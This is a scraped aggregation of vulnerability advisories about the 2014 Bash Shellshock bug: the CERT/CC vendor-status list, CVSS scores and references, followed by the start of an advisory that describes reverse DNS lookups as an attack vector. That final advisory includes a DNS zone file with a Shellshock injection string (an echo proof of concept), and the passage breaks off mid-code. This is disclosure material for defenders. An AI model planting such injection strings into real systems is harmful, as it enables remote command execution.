<http://www.fireeye.com/resources/pdfs/support-notices/FireEye-Statement-About-Bash-Shellshock-Vulnerability-CVE-2014-6271-and-CVE-2014-7169.pdf>\n\n### Fortinet, Inc. Affected\n\nNotified: September 25, 2014 Updated: September 26, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.fortiguard.com/advisory/FG-IR-14-030/>\n\n### GNU Bash Affected\n\nUpdated: September 25, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://ftp.gnu.org/gnu/bash/bash-4.3-patches/>\n\n### Gentoo Linux Affected\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.gentoo.org/security/en/glsa/glsa-201409-09.xml>\n\n### Hewlett-Packard Company __ Affected\n\nNotified: September 25, 2014 Updated: September 29, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nSee the following URL for more information from the vendor.\n\n### Vendor References\n\n * <http://alerts.hp.com/r?2.1.3KT.2ZR.15ee22.L8mgqE..N.ghvS.8f9A.bW89MQ%5f%5fDBOSFQK0>\n\n### IBM Corporation __ Affected\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www-01.ibm.com/support/docview.wss?uid=isg3T1021272>\n * [http://www-01.ibm.com/support/docview.wss?uid=swg21685433&myns=swgws&mynp=OCSSEQTP&mynp=OCSSEQTJ&mync=E](<http://www-01.ibm.com/support/docview.wss?uid=swg21685433&myns=swgws&mynp=OCSSEQTP&mynp=OCSSEQTJ&mync=E>)\n\n### Addendum\n\nAIX Toolbox for Linux Applications provides Bash and is vulnerable. IBM HTTP Server (IHS) is based on Apache and may act as an attack vector, depending on configuration.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252743 Feedback>).\n\n### Juniper Networks, Inc. Affected\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n**Statement Date: September 25, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://kb.juniper.net/JSA10648>\n\n### Mageia Affected\n\nUpdated: September 27, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://advisories.mageia.org/MGASA-2014-0388.html>\n\n### McAfee Affected\n\nNotified: September 25, 2014 Updated: October 07, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://kc.mcafee.com/corporate/index?page=content&id=SB10085](<https://kc.mcafee.com/corporate/index?page=content&id=SB10085>)\n\n### Monroe Electronics __ Affected\n\nUpdated: October 02, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.digitalalertsystems.com/registration_updates.html>\n * <http://www.digitalalertsystems.com/download/dasdec-aux_app_upgrade-2.5-1.i386.drpm>\n * <http://www.digitalalertsystems.com/download/dasdec_fc10-aux_app_upgrade-2.5-1.i386.drpm>\n * <http://www.digitalalertsystems.com/pdf/DASDEC%20BASH%20Update%20Release%20Notes%20R1.0.pdf>\n * <http://www.digitalalertsystems.com/pdf/DASDEC%20Software%20Update%20Instructions%2061512.pdf>\n * <http://www.monroe-electronics.com/EAS_pages/r189se_registration.html>\n * <http://www.monroe-electronics.com/EAS_pages/downloads/dasdec-aux_app_upgrade-2.5-1.i386.drpm>\n * <http://www.monroe-electronics.com/EAS_pages/downloads/dasdec_fc10-aux_app_upgrade-2.5-1.i386.drpm>\n * <http://www.monroe-electronics.com/EAS_pages/pdf/One-Net%20BASH%20Update%20Release%20Notes%20R1.0.pdf>\n * <http://www.monroe-electronics.com/EAS_pages/pdf/One-Net%20Software%20Update%20Instructions%2061512.pdf>\n\n### Addendum\n\nDASDEC-1EN running software version 2.0-2 reported to be vulnerable: <http://seclists.org/fulldisclosure/2014/Sep/107>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252743 Feedback>).\n\n### NEC Corporation Affected\n\nNotified: September 25, 2014 Updated: October 07, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://jpn.nec.com/security-info/av14-003.html>\n\n### NIKSUN __ Affected\n\nNotified: November 10, 2014 Updated: November 11, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`Information contained below is subject to change due to the evolving nature of \nCVE-reported information & available fixes. \n \n\"ShellShock\" CVE-2014-6271 & CVE-2014-7169 are now resolved in software patches \nmade available via NIKSUN SupportNet. NIKSUN has now produced software updates \nfor all supported product lines. We continue to observe activity on the NSON \n(NIKSUN Security Observation Network) to produce current threat detections \u00e2\u20ac\u201c \nmore signatures may be released as we continuously observe behavior globally. \nCurrent signatures should be downloaded & installed, available via SupportNet, \nto get the most out of your NIKSUN security products. \n \nThe BASH component defect affecting the community-at-large is serious, but \nunlike the Heartbleed defect, which generically affected many publically \navailable products in exactly the same way, Shellshock requires a specific set \nof conditions to exist for exploitation. \n \nNIKSUN is both a contributor to the open source community as well as a consumer \nand is leveraging those relationships to bring this issue to a satisfactory \nclose. \n \n\"ShellShock\" CVE-2014-6271 & CVE-2014-7169 are now resolved in software patches \nmade available via NIKSUN SupportNet. NIKSUN has now produced software updates \nfor all supported product lines, with additional work in progress on breaking \nCVEs related to ShellShock exposed in the last few days \u00e2\u20ac\u201c software currently \nin a quality assurance cycle will become available this week for remaining CVEs \nassociated with ShellShock now that the global community has agreed on a \nsustainable, supportable fix. We continue to observe activity on the NSON \n(NIKSUN Security Observation Network) to produce current threat detections with \nmore signatures released as we continuously observe behavior globally. Current \nsignatures should be downloaded & installed, available via SupportNet, to get \nthe most out of your NIKSUN security products. \n \nNIKSUN is committed to providing a rapid resolution to this issue while \nensuring quality, stability & completeness of a fix. \n \nThe list below is not a fully comprehensive version list \n \nNIKOS Appliance 4.3.2.0 \nNIKOS Appliance 4.3.1.2 \nNIKOS Appliance 4.4.1.1 \nNIKOS Appliance 4.4.1.2 \nNIKOS Appliance 4.5.0.0_9 \nNIKOS Appliance 4.5.0.1 \n \nNetOmni 4.3.1.2 \nNetOmni 4.3.2.0 \nNetOmni 4.4.1.1 \nNetOmni 4.4.1.2 \nNetOmni 4.5.0.0 \nNetOmni 4.5.0.1 \nNetOmni 4.5.1.0`\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NetApp __ Affected\n\nUpdated: September 29, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nSee the following URL for more information from the vendor\n\n### Vendor References\n\n * <https://library.netapp.com/ecm/ecm_get_file/ECMP1655016>\n\n### Novell, Inc. Affected\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.novell.com/security/cve/CVE-2014-6271.html>\n\n### Oracle Corporation __ Affected\n\nNotified: September 25, 2014 Updated: September 29, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://oss.oracle.com/pipermail/el-errata/2014-September/004485.html>\n * <http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html>\n\n### Addendum\n\nSolaris includes Bash and Oracle Linux is based on Red Hat Linux.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252743 Feedback>).\n\n### Palo Alto Networks __ Affected\n\nNotified: September 25, 2014 Updated: September 29, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://securityadvisories.paloaltonetworks.com/>\n\n### Addendum\n\nSee PAN-SA-2012-000{2,3,4,5}. Please use CVE.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252743 Feedback>).\n\n### QNAP Security Affected\n\nUpdated: April 14, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://www.qnap.com/i/en/news/con_show.php?op=showone&cid=360](<https://www.qnap.com/i/en/news/con_show.php?op=showone&cid=360>)\n\n### Red Hat, Inc. Affected\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://access.redhat.com/articles/1200223>\n * <https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/>\n\n### SUSE Linux Affected\n\nNotified: September 25, 2014 Updated: September 29, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.novell.com/security/cve/CVE-2014-6271.html>\n * <https://www.suse.com/support/shellshock/>\n * <https://www.suse.com/support/kb/doc.php?id=7015702>\n\n### Slackware Linux Inc. Affected\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n**Statement Date: September 25, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.522193](<http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.522193>)\n\n### Sophos, Inc. __ Affected\n\nUpdated: September 27, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAs far as we are aware, none of Sophos's Linux or UNIX products use Bash in a way that would allow this vulnerability to be exploited with data supplied by an attacker from outside.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.sophos.com/en-us/support/knowledgebase/121444.aspx>\n * <http://nakedsecurity.sophos.com/2014/09/25/bash-shellshock-vulnerability-what-you-need-to-know/>\n\n### Trend Micro Affected\n\nUpdated: September 27, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://esupport.trendmicro.com/solution/en-US/1105233.aspx>\n\n### Ubuntu Affected\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.ubuntu.com/usn/usn-2362-1/>\n\n### VMware Affected\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2090740](<http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2090740>)\n\n### Xirrus Affected\n\nUpdated: October 01, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://cdn.xirrus.com/pdf/Statement-on-ShellShock.pdf>\n\n### FreeBSD Project __ Not Affected\n\nNotified: September 25, 2014 Updated: September 26, 2014 \n\n**Statement Date: September 25, 2014**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nCurrently we have already patched CVE-2014-6271 and CVE-2014-7169 in the FreeBSD ports tree, making it no longer vulnerable to these two issues. We will patch the new issues once the fix is validated.\n\nThe FreeBSD base system do not use bash at all and is therefore not affected.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://svnweb.freebsd.org/ports?view=revision&revision=369341](<https://svnweb.freebsd.org/ports?view=revision&revision=369341>)\n\n### Addendum\n\nFreeBSD has disabled function importing by default in the Bash port.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252743 Feedback>).\n\n### Global Technology Associates, Inc. __ Not Affected\n\nNotified: September 25, 2014 Updated: October 01, 2014 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nGTA firewalls running any version of GB-OS are not vulnerable to the \"shellshock\" exploit.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Microsoft Corporation Not Affected\n\nNotified: September 25, 2014 Updated: October 10, 2014 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NetBSD Not Affected\n\nNotified: September 25, 2014 Updated: September 26, 2014 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://pkgsrc.se/files.php?messageId=20140925202832.9AD9C98@cvs.netbsd.org>\n\n### ACCESS Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### AT&T Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Alcatel-Lucent Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Belkin, Inc. Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### CA Technologies Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Cray Inc. Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### DragonFly BSD Project Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### EMC Corporation Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Engarde Secure Linux Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Enterasys Networks Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Ericsson Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Force10 Networks, Inc. Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Foundry Networks, Inc. Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Fujitsu Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Google Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hitachi Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### IBM Corporation (zseries) Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### IBM eServer Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Infoblox Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Intel Corporation Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Intoto Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Mandriva S. A. Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### MontaVista Software, Inc. Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Mozilla Unknown\n\nNotified: October 27, 2014 Updated: October 27, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Nokia Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OpenBSD Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Peplink Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Q1 Labs Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### QNX Software Systems Inc. Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Quagga Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SafeNet Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SmoothWall Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Snort Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sony Corporation Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sourcefire Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Spyrus Unknown\n\nNotified: November 19, 2014 Updated: November 19, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Stonesoft Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Symantec Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### The SCO Group Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### TippingPoint Technologies Inc. Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Turbolinux Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Unisys Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Vyatta Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Watchguard Technologies, Inc. Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Wind River Systems, Inc. Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### ZyXEL Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### eSoft, Inc. Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### m0n0wall Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### netfilter Unknown\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\nView all 93 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 9.5 | E:H/RL:W/RC:C \nEnvironmental | 9.6 | CDP:LM/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://seclists.org/oss-sec/2014/q3/650>\n * <https://access.redhat.com/articles/1200223>\n * <https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/>\n * <http://seclists.org/oss-sec/2014/q3/688>\n * <http://seclists.org/oss-sec/2014/q3/685>\n * <http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html>\n * <http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html>\n * <https://gist.github.com/anonymous/929d622f3b36b00c0be1>\n * <https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html>\n * <https://shellshocker.net/#>\n\n### Acknowledgements\n\nThis document was written by Chris King.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2014-6271](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-6271>), [CVE-2014-7169](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-7169>), [CVE-2014-6277](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-6277>), [CVE-2014-7186](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-7186>), [CVE-2014-7187](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-7187>) \n---|--- \n**Date Public:** | 2014-09-24 \n**Date First Published:** | 2014-09-25 \n**Date Last Updated: ** | 2015-04-14 20:35 UTC \n**Document Revision: ** | 56 \n", "modified": "2015-04-14T20:35:00", "published": "2014-09-25T00:00:00", "id": "VU:252743", "href": "https://www.kb.cert.org/vuls/id/252743", "type": "cert", "title": "GNU Bash shell executes commands in exported functions in environment variables", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-11T23:48:44", "edition": 2, "description": "DNS reverse lookups can be used as a vector of attack for the bash shellshock vulnerability.", "published": "2014-10-14T00:00:00", "type": "zdt", "title": "DNS Reverse Lookup Shellshock Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7186"], "modified": "2014-10-14T00:00:00", "id": "1337DAY-ID-22754", "href": "https://0day.today/exploit/description/22754", "sourceData": "DNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et.al.)\r\n\r\n CVE-2014-3671\r\n\r\nreferences:\r\n CVE-2014-6271, CVE-2014-7169, CVE-2014-6277, CVE-2014-6278 \r\n CVE-2014-7186 and, CVE-2014-7187\r\n\r\n* Summary:\r\n\r\nAbove CVEs detail a number of flaws in bash prior related to the parsing \r\nof environment variables (aka BashBug, Shellshock). Several networked\r\nvectors for triggering this bug have been discovered; such as through\r\ndhcp options and CGI environment variables in webservers [1].\r\n\r\nThis document is to advise you of an additional vector; through a \r\nreverse lookup in DNS; and where the results of this lookup are\r\npassed, unsanitized, to an environment variable (e.g. as part of\r\na batch process). \r\n\r\nThis vector is subtly different from a normal attack vector, as the\r\nattacker can 'sit back' and let a (legitimate) user trigger the\r\nissue; hence keeping the footprint for a IDS or WAAS to act on small.\r\n\r\n* Resolvers/systems affected:\r\n\r\nAt this point of time the stock resolvers (in combination with the libc\r\nlibrary) of OSX 10.9 (all versions) and 10.10/R2 are the only known\r\nstandard installations that pass the bash exploit string back and\r\nup to getnameinfo(). \r\n\r\nThat means that UNpatched systems are vulnerable through this vector\r\nPRIOR to the bash update documented in http://support.apple.com/kb/DL1769.\r\n\r\nMost other OS-es (e.g. RHEL6, Centos, FreeBSD 7 and up, seem \r\nunaffected in their stock install as libc/libresolver and DNS use \r\ndifferent escaping mechanisms (octal v.s. decimal).\r\n\r\nWe're currently following investing a number of async DNS resolvers\r\nthat are commonly used in DB cache/speed optimising products and\r\napplication level/embedded firewall systems.\r\n\r\nVersions affected: \r\n\r\nSee above CVEs as your primary source.\r\n\r\n* Resolution and Mitigation:\r\n\r\nIn addition to the mitigations listed in above CVEs - IDSes and similar \r\nsystems may be configured to parse DNS traffic in order to spot the \r\noffending strings.\r\n\r\nAlso note that Apple DL1769 addresses the Bash issue; NOT the vector\r\nthrough the resolver. \r\n\r\n* Reproducing the flaw:\r\n\r\nA simple zone file; such as:\r\n\r\n $TTL 10;\r\n $ORIGIN in-addr.arpa.\r\n @ IN SOA ns.boem.wleiden.net dirkx.webweaving.org (\r\n 666 ; serial\r\n 360 180 3600 1800 ; very short lifespan.\r\n )\r\n IN NS 127.0.0.1\r\n * PTR \"() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS\" \r\n\r\ncan be used to create an environment in which to test the issue with existing code\r\nor with the following trivial example:\r\n\r\n #include <sys/socket.h>\r\n #include <netdb.h>\r\n #include <assert.h>\r\n #include <arpa/inet.h>\r\n #include <stdio.h>\r\n #include <stdlib.h>\r\n #include 